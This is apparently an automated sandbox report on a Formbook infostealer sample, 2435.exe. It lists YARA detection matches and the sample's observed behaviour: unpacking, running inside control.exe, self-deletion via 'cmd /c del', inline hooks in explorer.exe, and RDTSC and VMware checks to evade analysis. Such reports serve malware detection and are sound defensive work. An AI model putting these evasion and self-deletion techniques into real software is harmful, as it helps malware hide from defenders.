Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9AB40	1_2_00A9AB40
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8841F	1_2_00A8841F
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3D466	1_2_00B3D466
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2581	1_2_00AA2581
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8D5E0	1_2_00A8D5E0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B425DD	1_2_00B425DD
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A70D20	1_2_00A70D20
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B42D07	1_2_00B42D07
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B41D55	1_2_00B41D55
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B42EF7	1_2_00B42EF7
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A96E30	1_2_00A96E30
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3D616	1_2_00B3D616
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B41FF1	1_2_00B41FF1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B4DFCE	1_2_00B4DFCE
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_00401030	1_1_00401030
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_0041E1FC	1_1_0041E1FC
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_0041D260	1_1_0041D260
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_0041DA2A	1_1_0041DA2A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FD466	9_2_047FD466
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0474841F	9_2_0474841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04730D20	9_2_04730D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_048025DD	9_2_048025DD
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04802D07	9_2_04802D07
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0474D5E0	9_2_0474D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04801D55	9_2_04801D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04762581	9_2_04762581
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04756E30	9_2_04756E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FD616	9_2_047FD616
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04802EF7	9_2_04802EF7
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0480DFCE	9_2_0480DFCE
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04801FF1	9_2_04801FF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_048020A8	9_2_048020A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475A830	9_2_0475A830
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_048028EC	9_2_048028EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1002	9_2_047F1002
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0480E824	9_2_0480E824
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047620A0	9_2_047620A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0474B090	9_2_0474B090
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04754120	9_2_04754120
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0473F900	9_2_0473F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047599BF	9_2_047599BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_048022AE	9_2_048022AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047EFA2B	9_2_047EFA2B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475AB40	9_2_0475AB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475A309	9_2_0475A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047E23E3	9_2_047E23E3
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F03DA	9_2_047F03DA
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04802B28	9_2_04802B28
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FDBD2	9_2_047FDBD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476ABD8	9_2_0476ABD8
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476EBB0	9_2_0476EBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCE1FC	9_2_02FCE1FC
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FB9E40	9_2_02FB9E40
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FB9E3C	9_2_02FB9E3C
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FB2FB0	9_2_02FB2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCDFA3	9_2_02FCDFA3
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCBDC4	9_2_02FCBDC4
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FB2D90	9_2_02FB2D90

Source: C:\Users\user\Desktop\2435.exe	Code function: String function: 00A7B150 appears 133 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 0473B150 appears 90 times

Source: 2435.exe, 00000000.00000003.228583086.0000000009C7F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
Source: 2435.exe, 00000001.00000002.288731755.0000000000CFF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
Source: 2435.exe, 00000001.00000002.288265327.00000000007E1000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs 2435.exe

Source: 2435.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@3/4

Source: C:\Users\user\Desktop\2435.exe

Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404356

Source: C:\Users\user\Desktop\2435.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

0_2_00402020

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01

Source: C:\Users\user\Desktop\2435.exe

File created: C:\Users\user\AppData\Local\Temp\nsq164.tmp

Jump to behavior

Source: 2435.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2435.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2435.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 2435.exe

ReversingLabs: Detection: 43%

Source: C:\Users\user\Desktop\2435.exe

File read: C:\Users\user\Desktop\2435.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
Source: C:\Users\user\Desktop\2435.exe	Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2435.exe	Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'	Jump to behavior

Source: C:\Users\user\Desktop\2435.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 2435.exe, control.exe
Source:	Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\2435.exe

Unpacked PE file: 1.2.2435.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\2435.exe

Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405E88

Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_73352F60 push eax; ret	0_2_73352F8E
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041E560 push ss; ret	1_2_0041E569
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041CEB5 push eax; ret	1_2_0041CF08
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041CF6C push eax; ret	1_2_0041CF72
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041CF02 push eax; ret	1_2_0041CF08
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041CF0B push eax; ret	1_2_0041CF72
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00ACD0D1 push ecx; ret	1_2_00ACD0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0478D0D1 push ecx; ret	9_2_0478D0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCCEB5 push eax; ret	9_2_02FCCF08
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCCF6C push eax; ret	9_2_02FCCF72
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCCF0B push eax; ret	9_2_02FCCF72
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCCF02 push eax; ret	9_2_02FCCF08
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FCE560 push ss; ret	9_2_02FCE569

Source: C:\Users\user\Desktop\2435.exe

File created: C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE2

Source: C:\Users\user\Desktop\2435.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\2435.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2435.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000002FB98E4 second address: 0000000002FB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000002FB9B5E second address: 0000000002FB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\2435.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\2435.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Windows\explorer.exe TID: 4424	Thread sleep time: -58000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6936	Thread sleep time: -65000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_00405E61 FindFirstFileA,FindClose,	0_2_00405E61
Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_0040548B
Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E

Source: explorer.exe, 00000002.00000000.251588245.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.240720085.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.266735293.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.253512969.0000000008CA8000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Module--
Source: explorer.exe, 00000002.00000000.252071585.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.245792621.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.252071585.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\2435.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\2435.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\2435.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Users\user\Desktop\2435.exe

Code function: 1_2_0040ACD0 LdrLoadDll,

1_2_0040ACD0

Source: C:\Users\user\Desktop\2435.exe

Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405E88

Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB90AF mov eax, dword ptr fs:[00000030h]	1_2_00AB90AF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA20A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA20A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA20A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA20A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA20A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA20A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]	1_2_00AAF0BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]	1_2_00AAF0BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]	1_2_00AAF0BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79080 mov eax, dword ptr fs:[00000030h]	1_2_00A79080
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]	1_2_00AF3884
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]	1_2_00AF3884
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]	1_2_00A740E1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]	1_2_00A740E1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]	1_2_00A740E1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A758EC mov eax, dword ptr fs:[00000030h]	1_2_00A758EC
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]	1_2_00A9B8E4
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]	1_2_00A9B8E4
